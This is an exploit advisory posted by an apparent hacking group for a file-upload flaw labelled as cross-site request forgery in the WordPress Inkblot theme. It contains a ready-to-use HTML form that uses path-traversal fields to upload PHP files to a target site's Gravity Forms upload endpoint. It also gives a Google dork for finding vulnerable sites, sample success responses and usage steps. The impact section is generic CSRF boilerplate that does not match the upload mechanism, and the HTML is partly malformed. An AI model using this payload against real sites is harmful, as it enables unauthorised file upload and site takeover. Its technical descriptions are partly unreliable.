WordPress Inkblot Theme 4.9.10 Cross Site Request Forgery

`####################################################################  
  
# Exploit Title : WordPress Inkblot Themes 4.9.10 Cross Site Request Forgery  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 22/05/2019  
# Vendor Homepage : wordpress.org - gravityforms.com  
# Software Download Link : github.com/mgsisk/inkblot/archive/master.zip  
# Software Information Link : wordpress.org/themes/inkblot  
# Software Affected Versions : 4.5.2 and 4.9.10 - 4.x  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : High  
# Google Dorks : intext:Powered by WordPress with Inkblot  
# Vulnerability Type : CWE-352 [ Cross-Site Request Forgery (CSRF) ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
####################################################################  
  
# Impact :  
***********  
WordPress Inkblot Themes is vulnerable to cross-site request forgery, caused by  
improper validation of user-supplied input. By persuading an authenticated user to visit   
a malicious Web site, a remote attacker could send a malformed HTTP request to   
perform unauthorized actions. An attacker could exploit this vulnerability to perform   
cross-site scripting attacks, Web cache poisoning, and other malicious activities.  
  
The web application does not, or can not, sufficiently verify whether a well-formed,   
valid, consistent request was intentionally provided by the user who submitted the request.  
When a web server is designed to receive a request from a client without any mechanism   
for verifying that it was intentionally sent, then it might be possible for an attacker to trick a   
client into making an unintentional request to the web server which will be treated as an   
authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and   
can result in exposure of data or unintended code execution.  
  
####################################################################  
  
# CSRF Cross Site Request Forgery Exploit :  
****************************************  
<title>WordPress Inkblot Themes Input Exploiter</title>  
  
<form action="http://[VULNERABLEWEBSITE]/?gf_page=upload" method="post" enctype="multipart/form-data">  
  
<body background=" ">  
  
<input type="file" name="file" id="file"><br>  
<input name="form_id" value="../../../" type=hidden">  
<input name="name" value="kingskrupellos.html" type=''hidden">  
<input name="gform_unique_id" value="../../" type="hidden">  
<input name="field_id" value="" type="hidden">  
<input type="submit" name="gform_submit" value="submit">  
  
</form>  
  
# Directory File Path :  
***********************  
/_input__kingskrupellos.php5  
  
/_input__[YOURFILENAME].php5  
  
# Vulnerability Error :   
*******************   
{"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}}  
  
# Vulnerability Error [ Successful ] :   
*******************************   
{"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}}  
  
# Allowed File Extensions :  
*************************   
.html .htm .php5 .php2 .txt .jpg .gif .png .html.fla .phtml .pdf   
  
# Example Usage for Windows :  
******************************   
# Use with XAMPP Control Panel and your Localhost.  
# Use from htdocs folder located in XAMPP   
  
# 127.0.0.1/wordpressinkblotexploiter.html  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`